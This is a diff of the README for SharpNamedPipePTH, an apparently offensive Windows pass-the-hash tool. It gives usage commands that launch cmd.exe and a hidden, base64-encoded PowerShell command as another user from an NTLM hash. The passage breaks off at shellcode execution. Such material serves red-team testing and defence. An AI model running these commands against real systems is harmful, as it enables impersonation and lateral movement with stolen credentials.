S3cur3Th1sSh1t/SharpNamedPipePTH/README.md

 The impersonated user unfortunately has *no network authentication* allowed, as the new process is using an Impersonation Token which is restricted.
 So you can only use this technique for local actions with another user.

 There are two ways to use SharpNamedPipePTH.
-Either you can execute a binary with given arguments:
+Either you can execute a binary (with or without arguments):

 `
 SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe
 `

 ![alt text](https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH/blob/main/Resources/Example1.JPG?raw=true)

+`
+SharpNamedPipePTH.exe username:testing domain:localhost  hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"
+`

 Or you can execute shellcode as the other user: